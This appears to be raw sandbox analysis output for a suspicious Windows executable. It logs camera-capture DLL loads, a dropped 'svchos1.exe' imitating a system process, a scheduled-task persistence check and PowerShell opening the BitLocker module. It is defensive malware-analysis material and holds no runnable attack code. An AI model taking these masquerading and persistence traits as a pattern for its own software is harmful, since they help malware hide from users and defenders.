Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Section loaded: msvfw32.dll	Jump to behavior

Source: C:\Users\user\Desktop\[System Process]12.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: [System Process]12.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: [System Process]12.exe

Static file information: File size 1792000 > 1048576

Source: [System Process]12.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12a800

Source: [System Process]12.exe

Static PE information: More than 200 imports for USER32.dll

Source: [System Process]12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: [System Process]12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: [System Process]12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: [System Process]12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: [System Process]12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: [System Process]12.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: [System Process]12.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: [System Process]12.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\ZZ\Desktop\RpcTsch\Release\RpcTsch.pdb source: [System Process]12.exe, [System Process]12.exe, 00000009.00000003.1568004818.0000000002F70000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: \Release\Dll1.pdb source: svchos1.exe
Source:	Binary string: C:\Users\zz\Desktop\sdfsd\Release\sdfsd.pdb source: [System Process]12.exe, 00000000.00000000.1063449375.000000000086C000.00000002.00000001.01000000.00000003.sdmp, [System Process]12.exe, 00000009.00000000.1277633035.000000000086C000.00000002.00000001.01000000.00000003.sdmp

Source: [System Process]12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: [System Process]12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: [System Process]12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: [System Process]12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: [System Process]12.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_00383D98 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

28_2_00383D98

Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F85ED9 push esi; ret	9_3_02F85EE2
Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F83620 push esi; ret	9_3_02F83621
Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F8360C push ds; ret	9_3_02F83615
Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F82D28 push ecx; ret	9_3_02F82D3B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02BC634D push eax; ret	12_2_02BC6361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_028F632D push eax; ret	22_2_028F6341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_06FD4638 push cs; iretd	22_2_06FD498E
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_003724D0 push ecx; ret	28_2_003724E3
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_00372915 push ecx; ret	28_2_00372928
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016D06BF push ebp; ret	28_2_016D06C7
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016C2B0F push ecx; ret	28_2_016C2B22
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016F2D8B push ecx; ret	28_2_016F2D9E
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_01713C2D push esi; ret	28_2_01713C36
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0371E134 push eax; ret	28_2_0371E162
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0385D7B0 push eax; ret	28_2_0385D7DE
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038E8A44 push ebp; retf	28_2_038E8A48
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_003724D0 push ecx; ret	33_2_003724E3
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_00372915 push ecx; ret	33_2_00372928
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0302E134 push eax; ret	33_2_0302E162
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0316D7B0 push eax; ret	33_2_0316D7DE

Source: C:\Users\user\Desktop\[System Process]12.exe

File created: C:\Users\Public\Documents\MM\svchos1.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\[System Process]12.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_0384F0E0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
